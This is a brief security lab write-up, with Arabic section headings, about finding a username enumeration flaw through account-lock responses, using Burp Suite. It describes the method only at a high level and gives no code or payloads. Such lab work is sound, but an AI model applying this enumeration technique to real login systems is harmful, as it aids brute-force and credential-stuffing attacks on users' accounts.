Username enumeration via account lock

Identified and exploited a username enumeration vulnerability in the authentication mechanism of a web application lab environment.

The application revealed whether a username existed in the system based on its account lock behavior after multiple failed login attempts. By analyzing the different responses from the server, it was possible to determine valid usernames registered in the system.

This type of vulnerability can help attackers gather valid account information, which can later be used in password brute-force attacks or credential-stuffing attempts.

الأدوات المستخدمة

Burp Suite

Browser Developer Tools

ما تم تنفيذه

Tested the login functionality with multiple usernames.

Observed differences in server responses when an account was locked.

Identified patterns that allowed enumeration of valid usernames.

Demonstrated how attackers could use this information to target specific accounts.

التأثير الأمني

This vulnerability allows attackers to discover valid usernames within the system, significantly increasing the success rate of brute-force or credential-stuffing attacks against user accounts.